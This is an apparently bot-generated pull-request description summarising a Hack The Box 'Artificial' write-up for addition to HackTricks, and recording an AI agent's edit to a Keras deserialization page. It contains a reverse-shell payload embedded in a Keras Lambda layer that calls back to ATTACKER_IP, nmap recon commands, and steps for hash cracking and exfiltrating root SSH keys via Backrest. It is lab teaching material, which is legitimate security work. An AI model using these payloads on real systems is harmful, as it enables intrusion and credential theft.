🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://0xdf.gitlab.io/2025/10/25/htb-artificial.html
• Blog Title: HTB Artificial: TensorFlow .h5 model RCE → Backrest creds leak → multiple root paths
• Suggested Section: Python -> Keras Model Deserialization RCE And Gadget Hunting

🎯 Content Summary

Target context
- HTB machine: Artificial (Linux/Ubuntu 20.04). External services: 22/SSH, 80/HTTP (nginx 1.18.0). Backend app is Flask; authenticated users can upload TensorFlow models (.h5) and click “View Predictions”.

Recon
- Full port scan: only 22, 80 open:

nmap -p- -vvv --min-rate 10000 10.10.11.74

nmap -p 22,80 -sCV 10.10.11.74

22/tcp OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
80/tcp nginx 1.18.0 (Ubuntu); redirect to http://artificial.htb</p...
🔧 Technical Details
Abusing Keras .h5 deserialization for code execution: Embed a malicious tf.keras.layers.Lambda in a model and save as .h5. When a server loads/builds the model or runs inference, your Python executes. Payload example for reverse shell:
def exploit(x):
  import os; os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'"); return x
Use exact target versions (e.g., TensorFlow 2.13.1, Python 3.8) to avoid serialization mismatches.
Credential pivot via app-local SQLite: Locate the app’s SQLite DB, dump user table, identify weak hashes (e.g., unsalted MD5), and crack with dictionaries. Reuse recovered passwords for su/SSH lateral movement.
Backrest data exfiltration via privileged backups: With Backrest admin, create a repository and a plan targeting sensitive paths (/root). Run backup, use Snapshot Browser and “Download files” to exfiltrate SSH keys (/root/.ssh/id...
🤖 Agent Actions

I analyzed the blog and repository, and found an existing, highly relevant page to update: src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md.
What I added:

A new practical exploitation section focused on TensorFlow-Keras HDF5 (.h5) Lambda RCE:

Minimal PoC code to craft a malicious .h5 with a reverse shell payload via tf.keras.layers.Lambda.
Notes on multiple execution trigger points (load/build/predict) and the need for idempotent payloads.
Version pinning and a simple Docker-based environment replication snippet (Python 3.8 + TF 2.13.1) to avoid serialization mismatches.
Validation tip using ICMP ping and tcpdump.
Defense-in-depth note reinforcing use of .keras with safe_mode=True and sandboxing.



Why this is the right place:

The page already covers Keras deserialization internals, Lambda RCE, and gadget hunting. The blog contributes a clear, end-to-end PoC and reliability guidance specifically for legacy .h5 usage, which was not yet illustrated with a concise exploit workflow.

What I did not add:

SQLite weak hash pivoting and Backrest exploitation details. These are separate techniques and would require different sections, but the instructions require not adding content in more than one file. Given the suggested section and the single-file constraint, I focused exclusively on the Keras model exploitation.

File modified:

src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md

References updated:

Added the blog URL: HTB Artificial – TensorFlow .h5 Lambda RCE to root (https://0xdf.gitlab.io/2025/10/25/htb-artificial.html)

No new files were created.

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.